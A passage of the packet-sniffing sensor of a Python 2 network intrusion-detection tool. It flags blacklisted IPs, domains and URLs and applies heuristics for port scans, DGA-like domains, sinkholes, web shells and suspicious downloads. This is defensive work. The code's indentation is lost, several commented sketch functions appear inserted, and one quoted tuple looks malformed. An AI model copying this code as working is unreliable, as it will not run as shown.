_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if subprocess.mswindows:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg, _ = "[!] please install 'Pcapy'", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install pcapy", ("debian", "ubuntu"): "sudo apt-get install python-pcapy"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
return _check_domain_member(query, WHITELIST)
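# Checks a DNS query first against the blacklist trails (exact or parent-domain
# match) and then, heuristically, for suspiciously long domain labels.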
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if _result_cache.get(query) == False:
return
result = False
if not _check_domain_whitelisted(query) and all(_ in VALID_DNS_CHARS for _ in query):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[query] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if len(_result_cache) > MAX_RESULT_CACHE_ENTRIES:
_result_cache.clear()
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = ip_data[h_size:]
if tcp_data.startswith("HTTP/"):
if any(_ in tcp_data[:tcp_data.find("\r\n\r\n")] for _ in ("X-Sinkhole:", "X-Malware-Sinkhole:", "Server: You got served", "Server: Apache 1.0/SinkSoft", "sinkdns.org")) or "\r\n\r\nsinkhole" in tcp_data:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS and not host.replace('.', "").isdigit():
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and not _check_domain_whitelisted(urlparse.urlparse(path).netloc.split(':')[0]):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, path, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = urllib.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get(user_agent)
if result is None:
if not any(_ in user_agent for _ in WHITELIST_UA_KEYWORDS):
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[user_agent] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[user_agent] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[user_agent] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if config.USE_HEURISTICS:
unquoted_path = urllib.unquote(path)
unquoted_post_data = urllib.unquote(post_data or "")
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not _check_domain_whitelisted(host):
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_path)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_path] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_post_data)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_post_data] = found or ""
if found:
trail = "%s(%s \(%s %s\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = urlparse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset])
if not length:
query = query[:-1]
break
query += dns_data[offset + 1:offset + length + 1] + '.'
offset += length + 1
query = query.lower()
if not query or '.' not in query or not all(_ in VALID_DNS_CHARS for _ in query) or any(_ in query for _ in (".intranet.",)) or any(query.endswith(_) for _ in IGNORE_DNS_QUERY_SUFFIXES):
return
parts = query.split('.')
if ord(dns_data[2]) == 0x01: # standard query
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2]) & 0x80: # standard response
if ord(dns_data[3]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails:
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec / 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec / 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) > 2:
part = parts[0] if parts[0] != "www" else parts[1]
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
else:
part = query
trail = query
if part and '-' not in part:
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
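# Illustrative sketch (not part of the original sensor): the "no such name" heuristic above
# scores the left-most label of the failed query by its Shannon entropy and by its consonant
# count (reference: https://github.com/exp0se/dga_detector). A standalone model of that
# scoring, reusing the module-level CONSONANTS and threshold constants referenced above,
# could look like this:
def _example_score_label(part):
    probabilities = (float(part.count(c)) / len(part) for c in set(part))
    entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
    if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
        return "entropy threshold no such domain (suspicious)"
    if sum(c in CONSONANTS for c in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
        return "consonant threshold no such domain (suspicious)"
    return None
# e.g. a random-looking label such as "xj4kqzpd9w" (ten distinct characters, entropy ~3.3 bits)
# scores higher than a dictionary word such as "mail" (entropy 2.0 bits)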
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails(server=config.UPDATE_SERVER)
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
trails.update(load_trails())
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
update_timer()
if check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError), msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.func_name = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
_caps.append(pcapy.open_offline(config.pcap_file))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if subprocess.mswindows or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and interface not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and not len(config.LOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
_cap.setfilter(config.CAPTURE_FILTER)
if _multiprocessing:
_init_multiprocessing()
if not subprocess.mswindows and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
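# Illustrative sketch (not part of the original sensor): the schedtool branch above picks the
# CPU affinity for this process by shifting the highest mask already used by other sensor
# instances one bit to the left and wrapping around the detected core count, falling back to
# core 0 (mask 0x1) on wrap-around or when nothing else is in use yet.
def _example_next_affinity(max_used_mask, cpu_count):
    # e.g. with 4 cores: 0x1 -> 0x2 -> 0x4 -> 0x8 -> wraps back to 0x1
    return max(1, (max_used_mask << 1) % 2 ** cpu_count)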
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = "\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER / MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
dlt_offset = DLT_OFFSETS[datalink]
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in ("\x00\x21", "\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == "\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in ("\x08\x00", "\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
sec, usec = header.getts()
if _multiprocessing:
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, struct.pack("=III", sec, usec, ip_offset) + packet)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
datalink = _cap.datalink()
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
_quit.set()
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _quit.is_set():
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError, ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, "", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
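# Illustrative sketch (not part of the original sensor): each block that packet_handler() above
# writes into the shared capture buffer starts with a 12-byte "=III" header (seconds,
# microseconds, IP offset) followed by the raw packet bytes; a worker process reading such a
# block would recover those fields symmetrically, e.g.:
def _example_split_block(block):
    sec, usec, ip_offset = struct.unpack("=III", block[:12])
    packet = block[12:]
    return sec, usec, ip_offset, packet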
def main():
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
